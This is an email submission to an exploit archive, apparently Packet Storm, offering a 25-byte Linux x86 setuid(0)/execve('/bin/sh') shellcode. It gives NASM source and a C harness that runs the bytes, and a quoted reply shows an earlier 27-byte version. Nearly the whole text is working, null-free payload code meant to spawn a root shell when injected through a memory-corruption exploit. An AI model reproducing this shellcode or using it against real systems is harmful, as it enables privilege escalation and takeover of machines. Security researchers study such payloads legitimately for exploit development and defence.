Linux/x86 - setuid(0) && execve() - 25 bytes

                                                Hi, i've shrinked down the shellcode to 25 bytes, the smallest setuid & 
execve GNU/Linux shellcode without nulls that spawns a shell.

--------------------------------------------------------------------------------------

SMALLEST SETUID & EXECVE GNU/LINUX x86 SHELLCODE WITHOUT NULLS THAT 
SPAWNS A SHELL

History:
    + v1.0 (27 bytes) => 
http://opensec.es/2008/11/14/gnulinux-x86-setuid0-execvebinsh00-shellcode-without-null/
    + v2.0 (26 bytes) => (http://vlan7.blogspot.com/) 
http://packetstormsecurity.org/filedesc/smallest_setuid_execve_sc.c.html

v3.0 (25 bytes)
################

[NASM_SOURCE_CODE]
global _start
section .text
_start:
;setuid
xor ecx,ecx
lea eax,[ecx+17h];setuid syscall
int 80h
;execve
push ecx;ecx = 0
push 0x68732f6e ;sh/
push 0x69622f2f ;nib//
mov ebx,esp;pointer to "struct pt_regs"
lea eax,[ecx+0Bh];execve syscall
int 80h
[/NASM_SOURCE_CODE]

[C_SOURCE_CODE]
#include 

const char shellcode[]=    
"\x31\xc9\x8d\x41\x17\xcd\x80\x51\x68\x6e\x2f\x73"
            "\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80";

int main()
{
    printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 SHELLCODE WITHOUT 
NULLS THAT SPAWNS A SHELL"
            "\n\nCoded by Chema Garcia (aka sch3m4)"
            "\n\t + [email protected]"
            "\n\t + http://opensec.es"
            "\n\n[+] Date: 22/11/2008"
            "\n\n[+] Thanks to: vlan7"
            "\n\n[+] Shellcode Size: %d bytes\n\n",sizeof(shellcode)-1);
       
    (*(void (*)()) shellcode)();

    return 0;
}
[/C_SOURCE_CODE]

--------------------------------------------------------------------------------------

Could you add it?

Greetings,
Chema Garc.a

[email protected] escribi.:
> Thanks; added!
>
>
> http://packetstormsecurity.org/shellcode/smallnonulls-exec.txt fbe997136460672e07de13d11aba57fc 27 bytes small GNU/Linux x86 setuid(0) && execve("/bin/sh",0,0) shellcode without NULLs.   Homepage: http://opensec.es/.   Authored By Chema Garcia
>
> On Thu, Nov 13, 2008 at 09:46:57PM +0100, sch3m4 wrote:
>   
>> Hello, I've developped the smallest linux x86 setuid(0) &  
>> execve("/bin/sh",0,0) shellcode without nullls with a size of 27bytes.
>>
>> -----------[ C Source Code ]-----------
>> /*
>> Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) Shellcode  
>> without NULLs
>>
>> Coded by Chema Garcia (aka sch3m4)
>>   + [email protected]
>>   + http://opensec.es
>>  Shellcode Size: 27 bytes
>>  Date: 13/11/2008
>> */
>>
>>
>> #include 
>>
>> const char shellcode[]=    "\x31\xC0"        //xor eax,eax
>>           "\x31\xC9"        //xor ecx,ecx
>>           "\xB0\x17"        //mov al,17h
>>           "\x60"            //pusha
>>           "\xCD\x80"        //int 80h
>>           "\x61"            //popa
>>           "\x51"            //push ecx
>>           "\x68\x6E\x2F\x73\x68"    //push 0x68732f6e
>>           "\x68\x2F\x2F\x62\x69"    //push 0x69622f2f
>>           "\x89\xE3"        //mov ebx, esp
>>           "\xB0\x0B"        //mov al,0xb
>>           "\xCD\x80";        //int 0x80
>>
>> int main()
>> {
>>   printf("Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0)  
>> Shellcode without NULLs"
>>           "\n\nCoded by Chema Garcia (aka sch3m4)"
>>           "\n\t + [email protected]"
>>           "\n\t + http://opensec.es"
>>           "\n\n[+] Shellcode Size: %d bytes\n\n",sizeof(shellcode)-1);
>>         //(*(void (*)()) shellcode)();
>>
>>   return 0;
>> }
>>
>> -----------[/ C Source Code ]-----------
>>
>> -----------[ ASM Source Code ]-----------
>> global _start
>>
>> section .text
>>
>> _start:
>>
>> xor eax,eax
>> xor ecx,ecx
>> mov al,17h
>> pusha
>> int 80h ;setuid
>> popa
>> push ecx
>> push 0x68732f6e
>> push 0x69622f2f
>> mov ebx, esp
>> mov al,0xb
>> int 0x80;execve
>>
>> -----------[/ ASM Source Code ]-----------
>>
>> Greetings,
>> Chema Garc.a
>>     
>
>